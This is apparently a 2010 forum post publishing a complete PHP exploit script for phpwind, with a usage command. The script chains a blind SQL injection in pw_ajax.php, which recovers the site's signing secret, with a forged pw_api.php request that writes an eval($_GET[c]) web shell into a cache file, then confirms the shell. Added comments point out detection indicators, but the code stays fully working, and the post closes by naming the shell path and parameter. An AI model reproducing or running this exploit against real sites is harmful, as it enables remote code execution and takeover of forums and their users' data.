phpwind漏洞EXP

2010, September 11, 10:14 AM. 漏洞集研
Submitted by admin

命令 :php pking.php user pass http://www.xxxx.com/

pking.php:

 

 

<?php
// Proof-of-concept published in 2010 for a phpwind vulnerability chain:
// a boolean-based blind SQL injection in pw_ajax.php that recovers a
// 32-character hex value, which is then used as the signing secret for a
// pw_api.php call. Annotated from a defender's perspective: the comments
// describe what each stage looks like on the wire (for log review and
// detection rules) and what to check on a suspect install. Nothing below
// changes the code; it is the listing as published.
//
// Extraction note: the "[url]"/"[/url]" fragments inside a few string
// literals look like forum BBCode artefacts from the page rendering rather
// than part of the original script. They are left untouched here.

echo "

Info: Poc for Phpwind远程命令执行

Test: exploit.php user password[/url]

";

// Usage check. It requires at least 3 argv entries (script name, user,
// password), but the script also reads $argv[3] below, so the target URL
// itself is not validated by this check.
if($argc<3){
    echo "\r\n参数缺少\r\n";
    die();
}

$user=$argv[1];   // forum account the script authenticates as (an ordinary user)
$pass=$argv[2];
$pwurl=$argv[3];  // base URL of the phpwind install; paths are appended with "/"

// Browser-like request headers sent on every request. The Referer is a
// fixed value unrelated to the target and the User-Agent is a fixed IE8
// string — both are constants a log search or WAF rule can key on.
$myheader=array(
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language: zh-cn,zh;q=0.5',
    'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'Referer: [url]http://www.wooyun.org/[/url]',
    'Connection: Keep-Alive',
    'Cache-Control: no-cache',
    'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
);

$cookie="";  // session cookie string, filled below; curlsend() reads it via `global`

// Stage 1: log in. A normal POST to login.php (step=2) with the supplied
// credentials; cktime=31536000 asks for a one-year cookie. The last
// argument (1) makes curlsend() return the response headers so Set-Cookie
// can be scraped. In logs this is an ordinary login immediately followed
// by the pw_ajax.php traffic below.
$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);

// Concatenate every Set-Cookie name=value (up to the first ';') into one
// Cookie header value for the authenticated requests that follow.
preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);
for($i=0;$i<count($array[1]);$i++){
    $cookie=$cookie.";".$array[1][$i];
}

//echo $cookie;

// Login sanity check: an '<ajax>' element in the body is treated as
// "not logged in". strpos() is used in boolean context here and below,
// so a match at offset 0 would be read as "not found".
$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);

if(strpos($test,'<ajax>')) {
    die('用户密码或者其他参数错误');
}

// Stage 2: boolean-based blind SQL injection via the `fieldname` parameter
// of pw_ajax.php (action=pcdelimg). URL-decoded, the injected fragment is
//   db_value from pw_config where db_name like 0x64625f736974656f776e65726964
//   and db_value like 0x{offset}25 union select 0x612e2e;#
// where 0x64625f736974656f776e65726964 is 'db_siteownerid', 0x612e2e is
// 'a..', {offset} is replaced by the hex of the prefix recovered so far and
// the trailing 25 is a '%' LIKE wildcard. Detection: POST bodies to
// pw_ajax.php containing action=pcdelimg together with an encoded
// "union select" / "like 0x" sequence are not produced by the normal UI.
$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";

$hash="0123456789abcdef";  // guess alphabet: the value being recovered is hex
$craked="";                // characters confirmed so far

// 32 positions x up to 16 guesses each: up to 512 near-identical POSTs from
// one session in a short burst, which is the behavioural indicator. The
// oracle is the literal "pw_config" appearing in the response body —
// presumably the server echoes part of the query (e.g. in an SQL error),
// confirming the guess. Any pw_ajax.php response that contains a table
// name is itself worth alerting on.
for($i=0;$i<32;$i++){
    for($n=0;$n<16;$n++){
        $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode);
        $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);
        if(strpos($tmp,"pw_config")){   // truthy strpos, see note above
            echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n";
            $craked=$craked.$hash[$n];
            break;
        }
    }
}

// The recovered value is used below as the secret in the `sig` hash, so on
// any install where this traffic is observed it should be treated as
// compromised, not merely the one account used for login.
echo "Craked Magicdata :".$craked."\r\n";

echo "Get shell :";

//another 0day
// Stage 3: a signed pw_api.php request with mode=Other and
// method=threadscateGory. `params` is a PHP-serialized nested array whose
// innermost string carries '.eval($_GET[c]).' ; `sig` is md5(query string
// . recovered value), i.e. the stage-2 value is the API signing key.
// Indicators: a pw_api.php request whose params contains "eval" or
// "$_GET", and any pw_api.php call arriving right after a burst of
// pw_ajax.php POSTs from the same session.
$arg='';
$hack = array();
$hack['mode'] = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';
$hack['type'] = 'app';

$hack = strips($hack);  // recursive stripslashes() over every value; see strips() below
ksort($hack);           // key order matters: `sig` covers the concatenated, sorted string
reset($hack);

// Build "key=value&" pairs. Values are not URL-encoded. No 'sig' key exists
// in $hack at this point, so that part of the condition never triggers.
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}

$arg.='sig='.md5($arg.$craked);

echo file_get_contents("$pwurl/pw_api.php?".$arg);
echo "OK\r\n";

// Stage 4: verification. The script fetches data/bbscache/info_class.php
// with a `c` query parameter and looks for the echoed marker; the flow
// implies the `params` string from stage 3 is persisted into that cache
// file and executed from there. On a suspect install, inspect
// data/bbscache/info_class.php for an eval($_GET fragment, and treat
// requests to that path that carry a `c=` query string as an indicator —
// a cache file would not normally be requested with parameters.
$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if(strpos($str,'wooyun')){
    echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();";
    echo "\r\nOver!";
}

 

 

/**
 * Apply stripslashes() to a value, descending recursively into arrays.
 *
 * Array keys are preserved; only the leaf values are rewritten. Used above
 * on the request parameters before they are concatenated and signed.
 *
 * @param array|string $param  a scalar string or a (possibly nested) array of them
 * @return array|string        same shape as the input with every leaf un-slashed
 */
function strips($param) {
    if (!is_array($param)) {
        return stripslashes($param);
    }
    // array_map with a single array keeps the original keys, matching a
    // keyed foreach rewrite.
    return array_map('strips', $param);
}

 

/**
 * Thin libcurl wrapper used for every request in this script.
 *
 * @param string $url      full request URL
 * @param mixed  $method   passed straight to CURLOPT_POST; every caller here
 *                         passes the string "POST", which is truthy, so all
 *                         requests are sent as POST
 * @param int    $ssl      when truthy, disables TLS peer verification
 *                         (no caller in this script passes a non-zero value)
 * @param array  $myheader list of raw request header lines
 * @param string $data     POST body; only attached when non-empty
 * @param int    $header   CURLOPT_HEADER: 1 = prepend response headers to the result
 * @return string|false    curl_exec() result — the raw response, or false on a
 *                         transport failure, which no caller checks for
 *
 * Notes: optional parameters ($method, $ssl) precede a required one
 * ($myheader), which PHP 8 reports as deprecated. The session cookie is read
 * from the global $cookie, so the same cookie string is replayed on every
 * request after the login at the top of the script.
 */
function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){
    global $cookie;
    $ch = curl_init();

    $timeout = 0; // set to zero for no timeout (CURLOPT_CONNECTTIMEOUT=0: never give up on connect)
    curl_setopt ($ch, CURLOPT_URL, $url);
    curl_setopt ($ch, CURLOPT_POST, $method);
    curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
    if($data){
        curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
    }
    curl_setopt ($ch, CURLOPT_HEADER, $header);
    if($ssl){
        // Turns off certificate validation entirely; unused by this script's callers.
        curl_setopt($ch,  CURLOPT_SSL_VERIFYPEER,  FALSE);
    }

    $handles = curl_exec($ch);
    curl_close($ch);
    //echo $handles;
    return $handles;

}

 

data/bbscache/info_class.php 密码c

Tags: phpwind
